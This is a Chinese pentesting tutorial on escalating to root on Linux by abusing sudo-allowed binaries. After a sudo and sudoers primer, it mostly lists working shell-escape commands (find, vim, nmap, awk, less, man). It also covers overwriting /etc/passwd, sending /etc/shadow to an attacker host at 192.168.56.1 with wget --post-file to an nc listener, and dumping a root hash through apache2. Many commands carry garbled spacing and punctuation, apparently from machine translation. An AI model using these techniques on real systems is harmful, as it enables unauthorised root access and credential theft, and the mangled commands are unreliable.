Linux提权姿势一：滥用SUDO提权

在渗透中，我们拿到的webshell和反弹回来的shell权限可能都不高，如果我们可以使用sudo命令访问某些程序，则我们可以使用sudo可以提权。在这里，我们可以通过调用一些二进制文件，这些文件可以帮助我们使用sudo命令提升特权。但是在特权升级之前，让我们了解一些sudoer文件语法，sudo命令是什么？;）。

1. 什么是SUDO？
2. Sudoer文件语法。
3. 利用SUDO用户
   • /usr/bin/find
   • /usr/bin/nano
   • /usr/bin/vim
   • /usr/bin/man
   • /usr/bin/awk
   • /usr/bin/less
   • /usr/bin/nmap ( –interactive and –script method)
   • /bin/more
   • /usr/bin/wget
   • /usr/sbin/apache2

什么是SUDO ??

sudo是linux系统管理指令，是允许系统管理员让普通用户执行一些或者全部的root命令的一个工具，如halt，reboot，su等等。这样不仅减少了root用户的登录 和管理时间，同样也提高了安全性。sudo不是对shell的一个代替，它是面向每个命令的。

基础

它的特性主要有这样几点：

§ sudo能够限制用户只在某台主机上运行某些命令。

§ sudo提供了丰富的日志，详细地记录了每个用户干了什么。它能够将日志传到中心主机或者日志服务器。

§ sudo使用时间戳文件来执行类似的“检票”系统。当用户调用sudo并且输入它的密码时，用户获得了一张存活期为5分钟的票（这个值可以在编译的时候改变）。

§ sudo的配置文件是sudoers文件，它允许系统管理员集中的管理用户的使用权限和使用的主机。它所存放的位置默认是在/etc/sudoers，属性必须为0440。

在sudo于1980年前后被写出之前，一般用户管理系统的方式是利用su切换为超级用户。但是使用su的缺点之一在于必须要先告知超级用户的密码。

sudo使一般用户不需要知道超级用户的密码即可获得权限。首先超级用户将普通用户的名字、可以执行的特定命令、按照哪种用户或用户组的身份执行等信息，登记在特殊的文件中（通常是/etc/sudoers），即完成对该用户的授权（此时该用户称为“sudoer”）；在一般用户需要取得特殊权限时，其可在命令前加上“sudo”，此时sudo将会询问该用户自己的密码（以确认终端机前的是该用户本人），回答后系统即会将该命令的进程以超级用户的权限运行。之后的一段时间内（默认为5分钟，可在/etc/sudoers自定义），使用sudo不需要再次输入密码。

由于不需要超级用户的密码，部分Unix系统甚至利用sudo使一般用户取代超级用户作为管理帐号，例如Ubuntu、Mac OS X等。

参数说明：

• -V 显示版本编号
• -h 会显示版本编号及指令的使用方式说明
• -l 显示出自己（执行 sudo 的使用者）的权限
• -v 因为 sudo 在第一次执行时或是在 N 分钟内没有执行（N 预设为五）会问密码，这个参数是重新做一次确认，如果超过 N 分钟，也会问密码
• -k 将会强迫使用者在下一次执行 sudo 时问密码（不论有没有超过 N 分钟）
• -b 将要执行的指令放在背景执行
• -p prompt 可以更改问密码的提示语，其中 %u 会代换为使用者的帐号名称， %h 会显示主机名称
• -u username/#uid 不加此参数，代表要以 root 的身份执行指令，而加了此参数，可以以 username 的身份执行指令（#uid 为该 username 的使用者号码）
• -s 执行环境变数中的 SHELL 所指定的 shell ，或是 /etc/passwd 里所指定的 shell
• -H 将环境变数中的 HOME （家目录）指定为要变更身份的使用者家目录（如不加 -u 参数就是系统管理者 root ）
• command 要以系统管理者身份（或以 -u 更改为其他人）执行的指令

Sudoer文件

sudoers文件主要有三部分组成：

• sudoers的默认配置（default），主要设置sudo的一些缺省值
• alias（别名），主要有Host_Alias|Runas_Alias|User_Alias|Cmnd_Alias。
• 安全策略（规则定义）——重点。

语法

root ALL=(ALL) ALL

说明1：root用户可以从 ALL 终端作为 ALL （任意）用户执行，并运行 ALL （任意）命令。

第一部分是用户，第二部分是用户可以在其中使用sudo命令的终端，第三部分是他可以充当的用户，最后一部分是他在使用时可以运行的命令。sudo

touhid ALL= /sbin/poweroff

说明2：以上命令，使用户可以从任何终端使用touhid的用户密码关闭命令电源。

touhid ALL = (root) NOPASSWD: /usr/bin/find

说明3：上面的命令，使用户可以从任何终端运行，以root用户身份运行命令find 而无需密码。

利用SUDO用户。

要利用sudo用户，您需要找到您必须允许的命令。sudo -l

上面的命令显示了允许当前用户使用的命令。

此处sudo -l，显示用户已允许以root用户身份执行所有此二进制文件而无需密码。

让我们一一查看所有二进制文件（仅在索引中提到）和将特权提升给root用户。

使用查找命令

sudo find / etc / passwd -exec / bin / sh \;

要么

sudo find / bin -name nano -exec / bin / sh \;

使用Vim命令

sudo vim -c'！sh'

使用Nmap命令

sudo nmap-交互式
nmap>！sh
sh-4.1＃

注意：nmap –interactive选项在最新的nmap中不可用。

也可以

echo“ os.execute（'/ bin / sh'）”> /tmp/shell.nse && sudo nmap --script = / tmp / shell.nse

使用Man命令

sudo man man

之后按！按下并按Enter

使用less/more命令

sudo less / etc / hosts

sudo more / etc / hosts

之后按！按下并按Enter

使用awk命令

 sudo awk'BEGIN {system（“ / bin / sh”）}'

使用nano命令

nano是使用此编辑器的文本编辑器，在您需要切换用户之后，您可以修改passwd文件并将用户添加为root特权。在/ etc / passwd中添加此行，以将用户添加为root特权。

touhid： 6 bxwJfzor

sudo nano / etc / passwd

现在切换用户密码是：test

su touhid

使用wget命令

这种非常酷的方式要求Web服务器下载文件。这样我从没在任何地方见过。让我们解释一下。

在At客者一边。

• 首先将Target的/ etc / passwd文件复制到攻击者计算机。
• 修改文件，并在上一步中保存的密码文件中添加用户到攻击者计算机。
• 仅附加此行=> touhid：
• 将passwd文件托管到使用任何Web服务器的主机。

在要提权主机方面。

sudo wget http://192.168.56.1:8080/passwd -O / etc / passwd

现在切换用户密码是：test

su touhid

注意：如果您要从服务器上转储文件，例如root的ssh密钥，shadow文件等。

sudo wget --post-file = / etc / shadow 192.168.56.1:8080

攻击者的设置侦听器：nc – lvp 8080

使用apache命令

但是，我们无法获得Shell和Cant编辑系统文件。

但是使用它 我们可以查看系统文件。

sudo apache2 -f / etc / shadow

输出是这样的：

Syntax error on line 1 of /etc/shadow:
Invalid command 'root:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:17298:0:99999:7:::', perhaps misspelled or defined by a module not included in the server configuration

可悲的是没有shell。但是我们可以现在提取root哈希，然后破解了哈希